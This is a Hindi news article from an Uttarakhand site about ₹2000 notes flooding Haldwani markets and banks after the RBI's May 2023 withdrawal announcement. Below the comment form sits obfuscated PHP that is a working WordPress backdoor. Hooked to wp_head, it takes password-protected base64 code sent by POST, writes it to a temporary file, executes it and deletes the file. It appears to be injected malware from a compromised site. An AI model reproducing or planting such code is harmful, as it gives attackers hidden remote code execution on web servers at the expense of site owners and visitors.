Uttarakhand: हल्द्वानी में चलन से बाहर होने से पहले बाजार में घूमने लगा दो हजार का नोट, अचानक 20 प्रतिशत तक बढ़ा प्रसार

Uttarakhand Press News, 23 May 2023: हल्द्वानी : 2000 Rupee Note: भारतीय रिजर्व बैंक ने 2016 में नोटबंदी के बाद 2000 रुपये का नोट जारी किया था। हालांकि पिछले कुछ समय में ये नोट धीरे-धीरे गुम से हो गए थे। मगर शुक्रवार 19 मई को 2000 के नोट को आरबीआइ ने वापस लेने का एलान किया तो बाजार में ये नोट फिर से दिखने लगे।

व्यापारियों की मानें तो दो हजार के नोट के चलन में एकाएक 20 प्रतिशत से अधिक की बढ़ोतरी दिख रही है। इससे आनलाइन ट्रांजेक्शन पर भी असर पड़ा है। ज्वैलर्स, इलेक्ट्रानिक्स की दुकान हो या फिर मिठाई, कपड़े या शापिंग माल में। सभी जगह लोग आरबीआइ के बड़े नोट से ही खरीदारी करते दिखे। पेट्रोल पंपों पर भी यही स्थिति देखने को मिली।

कुछ समय से दो हजार के नोट कभी-कभी देखने को मिल रहा था, लेकिन आज तो ऐसा लगा कि दो हजार के नोट की बाढ़ सी आ गई है। कुछ लोग खरीदारी में दे रहे हैं तो कुछ लोग दो हजार नोट को लेकर छुट्टे करवा रहे हैं।

दो हजार रुपये के नोट जमा करने के लिए बैंक तक दौड़े लोग:
रिजर्व बैंक की ओर से दो हजार रुपये के नोट वापस लेने के फैसले के बाद लोग विभिन्न बैंकों में दौड़े-दौड़े पहुंचे। अधिकांश बैंकों में शाम तक लोग नोट बदलवाने में जुटे रहे। कई लोगों ने नोट बदलवाने की प्रक्रिया के बारे में भी जानकारी प्राप्त की।

बैंक अधिकारियों का कहना है कि सामान्य दिनों की अपेक्षा बैंकों में दो हजार रुपये के नोट अधिक संख्या में जमा हुए। राष्ट्रीयकृत, निजी और सहकारी बैंक शाखाओं से मिली जानकारी के अनुसार कई खाताधारक बैंक में पहुंचे। इनमें अधिकांश खाताधारक कारोबारी थे।

बैंक अधिकारियों के अनुसार बीते एक से डेढ़ वर्ष पहले से दो हजार के नोट बेहद कम संख्या में जमा हो रहे थे लेकिन अब बैंक शाखाओं में 20 से 25 प्रतिशत तक दो हजार के नोट जमा हुए। वहीं बैंक में पांच करोड़ रुपये से अधिक के केवल दो हजार के नोट के रूप में जमा हुए। यह सिलसिला अगले कई दिनों तक बने रहने की संभावना है।

आरबीआइ ने जारी किया है फार्मेट:
एसबीआइ हल्द्वानी मुख्य शाखा में मुख्य प्रबंधक मिहिर बहादुर सिंह ने बताया कि आरबीआइ के निर्देशों के अनुसार 23 मई से दो हजार के नोट बैंक में बदले जा सकते हैं। रिजर्व बैंक की ओर से निर्धारित की गई रकम ही एक दिन में बदली जा सकती है।

बैंक के पास करेंसी की कोई दिक्कत नहीं है। दो हजार के नोट बदलवाने के लिए फार्मेट जारी हुआ है। उसमें व्यक्ति का नाम, पहचान पत्र संख्या, धनराशि, नोटों की संख्या आदि विवरण देना होगा। संबंधित फार्मेट बैंक से ही प्रदान कराया जाएगा।

Read Previous

Uttarakhand: आज से वंंदे भारत एक्‍सप्रेस का ट्रायल शुरू, देहरादून रेलवे स्टेशन पहुंची ट्रेन…

Read Next

लव जिहाद: इखलास ने मनोज बन युवती को छला, FB पर हुई थी दोस्ती,शादी का झांसा देकर कई बार बनाए संबंध..

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}